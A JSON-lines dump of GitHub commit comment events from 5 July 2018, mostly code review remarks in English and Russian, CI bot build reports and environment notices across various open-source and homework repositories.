{"id":"7925004097","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29612184,"position":null,"line":null,"path":null,"commit_id":"0abfdb3236f44607c9d9abc054b8000b4a5fd6f9","created_at":"2018-07-05T19:00:26Z","updated_at":"2018-07-05T19:00:26Z","author_association":"MEMBER","body":"I think there was a valid reason I left these out... "}},"created_at":"2018-07-05T19:00:26Z"}
{"id":"7925005466","type":"CommitCommentEvent","actor":{"login":"tstruk"},"repo":{"name":"tpm2-software/tpm2-tss"},"payload":{"comment":{"id":29612189,"position":null,"line":null,"path":null,"commit_id":"65aa40fcef27aa3f5f4030c5857db0ebdda5342f","created_at":"2018-07-05T19:00:43Z","updated_at":"2018-07-05T19:00:43Z","author_association":"MEMBER","body":"The check for ps is still missing. It is part of the procps package (debian/ubuntu) or procps-ng (fedora)"}},"created_at":"2018-07-05T19:00:43Z"}
{"id":"7925007176","type":"CommitCommentEvent","actor":{"login":"ThibG"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29612197,"position":31,"line":206,"path":"app/lib/feed_manager.rb","commit_id":"cdb101340a20183a82889f811d9311c370c855e5","created_at":"2018-07-05T19:01:03Z","updated_at":"2018-07-05T19:01:03Z","author_association":"COLLABORATOR","body":"Hm… how well does it handle reblogs?"}},"created_at":"2018-07-05T19:01:03Z"}
{"id":"7925008329","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"viveksyngh/faas"},"payload":{"comment":{"id":29612200,"position":null,"line":null,"path":null,"commit_id":"51f7818dcc7fb17bcac5f41e595af5babcdd47ec","created_at":"2018-07-05T19:01:17Z","updated_at":"2018-07-05T19:01:17Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-05T19:01:17Z"}
{"id":"7925009184","type":"CommitCommentEvent","actor":{"login":"tooptooptoop"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29612206,"position":null,"line":null,"path":null,"commit_id":"e4091fb6c963be3a613ce7e073c7fdad7d588b2e","created_at":"2018-07-05T19:01:29Z","updated_at":"2018-07-05T19:01:29Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-05T19:01:29Z"}
{"id":"7925010320","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612210,"position":41,"line":70,"path":"src/index.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T19:01:43Z","updated_at":"2018-07-05T19:01:43Z","author_association":"COLLABORATOR","body":"You don't need to create the new `e` variable.\r\nAnd you should use `handleCheck={this.checkItem}`.\r\nWhen you call this function for the child component`Item`, you should pass the `index` prop to the function."}},"created_at":"2018-07-05T19:01:43Z"}
{"id":"7925010813","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"viveksyngh/faas"},"payload":{"comment":{"id":29612212,"position":null,"line":null,"path":null,"commit_id":"51f7818dcc7fb17bcac5f41e595af5babcdd47ec","created_at":"2018-07-05T19:01:50Z","updated_at":"2018-07-05T19:01:50Z","author_association":"NONE","body":"I think the syntax can also support a default in the yaml file. "}},"created_at":"2018-07-05T19:01:50Z"}
{"id":"7925010853","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.03"},"payload":{"comment":{"id":29612213,"position":24,"line":24,"path":"Logic.Task2.Tests/AdditionalMathPackTests.cs","commit_id":"fa8a44b0bbbfe21bd8549685093e3fe7fa6f17f9","created_at":"2018-07-05T19:01:51Z","updated_at":"2018-07-05T19:01:51Z","author_association":"OWNER","body":"Исправлено: https://github.com/Zhikh/NET.S.2018.Zhikh.03/commit/3e64f6809c76412ddb2b87f09c49ac7edc9033f7."}},"created_at":"2018-07-05T19:01:51Z"}
{"id":"7925013785","type":"CommitCommentEvent","actor":{"login":"enextiarg"},"repo":{"name":"enextiarg/laravel-modules"},"payload":{"comment":{"id":29612217,"position":5,"line":91,"path":"src/Commands/stubs/scaffold/provider.stub","commit_id":"ca92218ce33affce6c25791295f11cfacdc04622","created_at":"2018-07-05T19:02:25Z","updated_at":"2018-07-05T19:02:25Z","author_association":"OWNER","body":"You r right"}},"created_at":"2018-07-05T19:02:25Z"}
{"id":"7925014109","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612219,"position":27,"line":8,"path":"src/item.js","commit_id":"597aa1ab7337cd08f0bccb1019125f3f4b62ea87","created_at":"2018-07-05T19:02:29Z","updated_at":"2018-07-05T19:02:29Z","author_association":"COLLABORATOR","body":"this should become  `() => this.props.handleCheck(this.props.index`)}"}},"created_at":"2018-07-05T19:02:29Z"}
{"id":"7925015721","type":"CommitCommentEvent","actor":{"login":"AnkitaMohanty"},"repo":{"name":"AnkitaMohanty/Machine-Learning"},"payload":{"comment":{"id":29612221,"position":null,"line":null,"path":null,"commit_id":"de4774df382dfd535555d8aa2834ea450b782438","created_at":"2018-07-05T19:02:49Z","updated_at":"2018-07-05T19:02:49Z","author_association":"OWNER","body":"encoding correction"}},"created_at":"2018-07-05T19:02:49Z"}
{"id":"7925018976","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29612229,"position":null,"line":null,"path":null,"commit_id":"0eb7ee6df5d73215e85680f4e99242e588c72cdb","created_at":"2018-07-05T19:03:32Z","updated_at":"2018-07-05T19:03:32Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3158 "}},"created_at":"2018-07-05T19:03:32Z"}
{"id":"7925019778","type":"CommitCommentEvent","actor":{"login":"phillips-jordan"},"repo":{"name":"decodejacques/fundamentals-javascript"},"payload":{"comment":{"id":29612234,"position":null,"line":null,"path":null,"commit_id":"6fe4e763181336ef952fe90b5ed82ab167dbdc75","created_at":"2018-07-05T19:03:43Z","updated_at":"2018-07-05T19:03:43Z","author_association":"COLLABORATOR","body":"***\r\nline 3 in ./02_return/test/problem1.js\r\n***"}},"created_at":"2018-07-05T19:03:43Z"}
{"id":"7925020748","type":"CommitCommentEvent","actor":{"login":"lrdgtri"},"repo":{"name":"lrdgtri/NIEM.github.io"},"payload":{"comment":{"id":29612236,"position":null,"line":null,"path":null,"commit_id":"dfb2ae9b40eba96c3a72f275050c2f98496d7abe","created_at":"2018-07-05T19:03:55Z","updated_at":"2018-07-05T19:03:55Z","author_association":"OWNER","body":"Leaving #133 open. This is the scenario planning page."}},"created_at":"2018-07-05T19:03:55Z"}
{"id":"7925021423","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29612238,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-05T19:04:04Z","updated_at":"2018-07-05T19:04:04Z","author_association":"NONE","body":"@roryk Thanks for the mention, but grabbing your fortune entry is somewhat unavoidable with this approach, since it runs an interactive shell. The previous (and much more robust) approach was to use `exec-path-from-shell` to grab only explicitly requested environment variables, but had other downsides — the assumption here is that you must edit the output until it's actually good.\r\n\r\nRegarding sorting, I agree with your concern, but multiple entries can't be applied in the right order; this file will never contain sth. like `PATH=$PATH:/foo/bar`, just `PATH=/path:/sequence`, so one entry will override the other.\r\n\r\nSorting is done to delete duplicates, but it could be done more carefully — using a *stable* sorting on the \"key\" part only would preserve the relative ordering of conflicting definitions. But that at most ensures the second shell always overrides the first — you still run into problems.\r\n\r\nSee also #10906."}},"created_at":"2018-07-05T19:04:04Z"}
{"id":"7925021767","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29612240,"position":826,"line":826,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T19:04:09Z","updated_at":"2018-07-05T19:04:09Z","author_association":"NONE","body":"Use soup"}},"created_at":"2018-07-05T19:04:09Z"}
{"id":"7925024548","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612242,"position":25,"line":25,"path":"App.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:04:46Z","updated_at":"2018-07-05T19:04:46Z","author_association":"NONE","body":"export-ы лучше группировать внизу файла. Чтобы было явно видно что экспортится."}},"created_at":"2018-07-05T19:04:46Z"}
{"id":"7925025337","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29612244,"position":null,"line":null,"path":null,"commit_id":"2d884c1c59a46282326bdf6583076f397280ade0","created_at":"2018-07-05T19:04:57Z","updated_at":"2018-07-05T19:04:57Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-408](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-408).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-408-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T19:04:57Z"}
{"id":"7925026270","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29612248,"position":823,"line":823,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T19:05:09Z","updated_at":"2018-07-05T19:05:09Z","author_association":"NONE","body":"This range will eventually be invalid, may want to check if the number of pages is returned in a response, parseable on the page, or just keep going until fetching the page fails"}},"created_at":"2018-07-05T19:05:09Z"}
{"id":"7925026504","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612249,"position":8,"line":8,"path":"App.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:05:12Z","updated_at":"2018-07-05T19:05:12Z","author_association":"NONE","body":"Есть какой-то принцип, по которму ты здесь пробел поставил?"}},"created_at":"2018-07-05T19:05:12Z"}
{"id":"7925026634","type":"CommitCommentEvent","actor":{"login":"OKA852"},"repo":{"name":"justinmeister/Mario-Level-1"},"payload":{"comment":{"id":29612250,"position":null,"line":null,"path":null,"commit_id":"5c1ad89c6420e0630dc192cd6cc257851358a489","created_at":"2018-07-05T19:05:13Z","updated_at":"2018-07-05T19:05:13Z","author_association":"NONE","body":"Can I have a go at the first level?\r\n"}},"created_at":"2018-07-05T19:05:13Z"}
{"id":"7925031773","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612258,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T19:06:14Z","updated_at":"2018-07-05T19:06:14Z","author_association":"CONTRIBUTOR","body":"lol there is no char limit don't worry"}},"created_at":"2018-07-05T19:06:14Z"}
{"id":"7925032532","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29612260,"position":null,"line":null,"path":null,"commit_id":"d84401897539173eedb40d49238d8a2189915c6d","created_at":"2018-07-05T19:06:22Z","updated_at":"2018-07-05T19:06:22Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3158 "}},"created_at":"2018-07-05T19:06:22Z"}
{"id":"7925033102","type":"CommitCommentEvent","actor":{"login":"lugithub"},"repo":{"name":"lugithub/l-rx"},"payload":{"comment":{"id":29612262,"position":null,"line":null,"path":null,"commit_id":"c0a35e806647f39b1cec2781daa3665d5baa5874","created_at":"2018-07-05T19:06:28Z","updated_at":"2018-07-05T19:06:28Z","author_association":"OWNER","body":"https://blog.angularindepth.com/rxjs-multicasts-secret-760e1a2b176e"}},"created_at":"2018-07-05T19:06:28Z"}
{"id":"7925035838","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29612266,"position":null,"line":null,"path":null,"commit_id":"e100e9f89ff8070afb405ea9d2f625464f89aaaf","created_at":"2018-07-05T19:06:58Z","updated_at":"2018-07-05T19:06:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-726](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-726).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-726-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T19:06:58Z"}
{"id":"7925037516","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612267,"position":4,"line":48,"path":"src/index.js","commit_id":"9acdc29c2f6abfca4eac4051d47d19fdcf4912ec","created_at":"2018-07-05T19:07:16Z","updated_at":"2018-07-05T19:07:16Z","author_association":"COLLABORATOR","body":"Your commit message is empty. What's up?"}},"created_at":"2018-07-05T19:07:16Z"}
{"id":"7925038769","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612274,"position":8,"line":51,"path":"src/index.js","commit_id":"9acdc29c2f6abfca4eac4051d47d19fdcf4912ec","created_at":"2018-07-05T19:07:32Z","updated_at":"2018-07-05T19:07:32Z","author_association":"COLLABORATOR","body":"Still checking the whole list."}},"created_at":"2018-07-05T19:07:32Z"}
{"id":"7925041535","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"di-shykh/RssReader"},"payload":{"comment":{"id":29612277,"position":9,"line":159,"path":"src/store/modules/userSources.js","commit_id":"ffcf793968f27aec92ed4e7039b42f3ad589a9de","created_at":"2018-07-05T19:08:11Z","updated_at":"2018-07-05T19:08:11Z","author_association":"COLLABORATOR","body":"Можно через template strings `sources/${art.source.key}/source/articles/${art.article_key}/readLater`"}},"created_at":"2018-07-05T19:08:11Z"}
{"id":"7925043666","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612281,"position":26,"line":26,"path":"src/screens/AddRecipeScreen.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:08:40Z","updated_at":"2018-07-05T19:08:40Z","author_association":"NONE","body":"Стоило в App.js создать компонент App и там ApolloProvider прописать. Не пришлось бы повторяться, даже клиента два создал. apollo-client предполагает, что во всем приложении будет всего один провайдер "}},"created_at":"2018-07-05T19:08:40Z"}
{"id":"7925044509","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612283,"position":28,"line":70,"path":"src/index.js","commit_id":"9acdc29c2f6abfca4eac4051d47d19fdcf4912ec","created_at":"2018-07-05T19:08:52Z","updated_at":"2018-07-05T19:08:52Z","author_association":"COLLABORATOR","body":"Item does not have any children. You should instanciate it this way:\r\n```javascript\r\n<Item\r\n  / ...a bunch of props\r\n  // one in each line\r\n/>\r\n```"}},"created_at":"2018-07-05T19:08:52Z"}
{"id":"7925046335","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612287,"position":null,"line":null,"path":null,"commit_id":"974d0bc8292bedf1a7ac3263b2e5d48481a16bd3","created_at":"2018-07-05T19:09:15Z","updated_at":"2018-07-05T19:09:15Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2306 of 2306 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-974d0bc8292bedf1a7ac3263b2e5d48481a16bd3-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-974d0bc8292bedf1a7ac3263b2e5d48481a16bd3-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T19:09:15Z"}
{"id":"7925046537","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29612288,"position":898,"line":898,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T19:09:18Z","updated_at":"2018-07-05T19:09:18Z","author_association":"NONE","body":"Is this just a random string? or an actual api key? Even if its just an identifier for you, you should never put this on github, its now compromised"}},"created_at":"2018-07-05T19:09:18Z"}
{"id":"7925046718","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612289,"position":27,"line":27,"path":"src/screens/HomeScreen.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:09:20Z","updated_at":"2018-07-05T19:09:20Z","author_association":"NONE","body":"Не понимаю, зачем здесь этот View"}},"created_at":"2018-07-05T19:09:20Z"}
{"id":"7925047851","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612295,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T19:09:36Z","updated_at":"2018-07-05T19:09:36Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-05T19:09:36Z"}
{"id":"7925047945","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612296,"position":3,"line":3,"path":"src/screens/HomeScreen.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:09:37Z","updated_at":"2018-07-05T19:09:37Z","author_association":"NONE","body":"Удаляй импорты, которые не используешь"}},"created_at":"2018-07-05T19:09:37Z"}
{"id":"7925048659","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612298,"position":5,"line":6,"path":"src/item.js","commit_id":"9acdc29c2f6abfca4eac4051d47d19fdcf4912ec","created_at":"2018-07-05T19:09:47Z","updated_at":"2018-07-05T19:09:47Z","author_association":"COLLABORATOR","body":"Good to move this here.\r\nYou can use a shortcut for the conditional:\r\n`className={this.props.checked && 'done'}`\r\n"}},"created_at":"2018-07-05T19:09:47Z"}
{"id":"7925048738","type":"CommitCommentEvent","actor":{"login":"simscred"},"repo":{"name":"sourcecred/sourcecred"},"payload":{"comment":{"id":29612299,"position":null,"line":null,"path":null,"commit_id":"1cda37e91aed1ace0dd690eebe567afdd330e0b7","created_at":"2018-07-05T19:09:48Z","updated_at":"2018-07-05T19:09:48Z","author_association":"NONE","body":"@decentralion gimme credit ho im tryna become a helpful-crypto billionaire buy yachts and cans of the fancy soup from writing readmes."}},"created_at":"2018-07-05T19:09:48Z"}
{"id":"7925050200","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29612303,"position":8,"line":51,"path":"src/index.js","commit_id":"9acdc29c2f6abfca4eac4051d47d19fdcf4912ec","created_at":"2018-07-05T19:10:09Z","updated_at":"2018-07-05T19:10:09Z","author_association":"OWNER","body":"That was before\n\nOn Thu, Jul 5, 2018 at 8:07 PM, Hideya Swider <notifications@github.com>\nwrote:\n\n> Still checking the whole list.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ImenBenA/Tasks/commit/9acdc29c2f6abfca4eac4051d47d19fdcf4912ec#commitcomment-29612274>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AihdtipKPMMfmoQ3OLmUGHarn6XW96-nks5uDmP0gaJpZM4VEZOm>\n> .\n>\n"}},"created_at":"2018-07-05T19:10:09Z"}
{"id":"7925052029","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/terminal.ink"},"payload":{"comment":{"id":29612308,"position":null,"line":null,"path":null,"commit_id":"604a49720a24e32da1ebf52304fbc423724e379b","created_at":"2018-07-05T19:10:30Z","updated_at":"2018-07-05T19:10:30Z","author_association":"MEMBER","body":"~~hey can someone add paint.terminal.ink?~~"}},"created_at":"2018-07-05T19:10:30Z"}
{"id":"7925054017","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29612311,"position":null,"line":null,"path":null,"commit_id":"cab9afa62b7504a7952458f159cf418ffebd2973","created_at":"2018-07-05T19:10:55Z","updated_at":"2018-07-05T19:10:55Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T19:10:55Z"}
{"id":"7925054798","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612316,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T19:11:06Z","updated_at":"2018-07-05T19:11:06Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T19:11:06Z"}
{"id":"7925055763","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612317,"position":22,"line":22,"path":"src/screens/InfoRecipeScreen.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:11:19Z","updated_at":"2018-07-05T19:11:19Z","author_association":"NONE","body":"почему бы так не написать?\r\n\r\n`title: navigation.state.params.getItem.title,`\r\n\r\nА вообще лучше использовать `getParam(paramName)`\r\n\r\n`title: navigation.getParam('getItem', {title: ''})`\r\n\r\nhttps://reactnavigation.org/docs/en/params.html"}},"created_at":"2018-07-05T19:11:19Z"}
{"id":"7925056357","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29612321,"position":null,"line":null,"path":null,"commit_id":"413c0f5265eb8cac77b17913bb9091816318997d","created_at":"2018-07-05T19:11:27Z","updated_at":"2018-07-05T19:11:27Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: OK (2928 of 2930 tests passed, 10 test warnings)\n\nMessages:\n\n * 4 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 8 tests had: AUD diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-413c0f5265eb8cac77b17913bb9091816318997d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-413c0f5265eb8cac77b17913bb9091816318997d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T19:11:27Z"}
{"id":"7925057397","type":"CommitCommentEvent","actor":{"login":"roryk"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29612323,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-05T19:11:42Z","updated_at":"2018-07-05T19:11:42Z","author_association":"CONTRIBUTOR","body":"Thanks for the super good explanation Paulo."}},"created_at":"2018-07-05T19:11:42Z"}
{"id":"7925057875","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612326,"position":28,"line":28,"path":"src/screens/InfoRecipeScreen.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:11:49Z","updated_at":"2018-07-05T19:11:49Z","author_association":"NONE","body":"Почему бы здесь сразу Text не возвратить"}},"created_at":"2018-07-05T19:11:49Z"}
{"id":"7925059529","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612333,"position":28,"line":28,"path":"src/screens/InfoRecipeScreen.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:12:13Z","updated_at":"2018-07-05T19:12:13Z","author_association":"NONE","body":"Еще здесь нужно prop `key` указать."}},"created_at":"2018-07-05T19:12:13Z"}
{"id":"7925061863","type":"CommitCommentEvent","actor":{"login":"haakov"},"repo":{"name":"gnuradio/gnuradio"},"payload":{"comment":{"id":29612338,"position":null,"line":null,"path":null,"commit_id":"28c1644e663b744417d3712f588dcadb98700f40","created_at":"2018-07-05T19:12:44Z","updated_at":"2018-07-05T19:12:44Z","author_association":"CONTRIBUTOR","body":"@btashton @marcusmueller \r\n\r\nHey I might be overseeing something, but shouldn't the `threshold_method` be added to the `<make>` parameters @ line 6 in the XML file? Because otherwise, changing the threshold method from GRC won't really do anything, right?"}},"created_at":"2018-07-05T19:12:44Z"}
{"id":"7925063343","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612340,"position":11,"line":11,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:13:04Z","updated_at":"2018-07-05T19:13:04Z","author_association":"NONE","body":"Стоило разделить этот GraphQL стринг на несколько строк, неудобно читать"}},"created_at":"2018-07-05T19:13:04Z"}
{"id":"7925064977","type":"CommitCommentEvent","actor":{"login":"pwalczysko"},"repo":{"name":"ome/training-scripts"},"payload":{"comment":{"id":29612344,"position":20,"line":20,"path":"maintenance/scripts/delete_ROIs.py","commit_id":"9a31c2f9955ad88ce4941e1278e09ea094764a5b","created_at":"2018-07-05T19:13:24Z","updated_at":"2018-07-05T19:13:24Z","author_association":"MEMBER","body":"I am afraid I have two instances of this script failing to delete ROIs on two last images of the first dataset of the idr0021 project. Both on outreach and on localhost. \r\nThere is no reported failure and the script has the output as expected, but there were some ROIs left on [these images](http://outreach.openmicroscopy.org/webclient/?show=image-9571|image-9570). I deleted these ROIs manually in iviewer.\r\nMaybe this script needs one more look @will-moore ?"}},"created_at":"2018-07-05T19:13:24Z"}
{"id":"7925065004","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612345,"position":19,"line":19,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:13:25Z","updated_at":"2018-07-05T19:13:25Z","author_association":"NONE","body":"стоило побольше подумать о названии)"}},"created_at":"2018-07-05T19:13:25Z"}
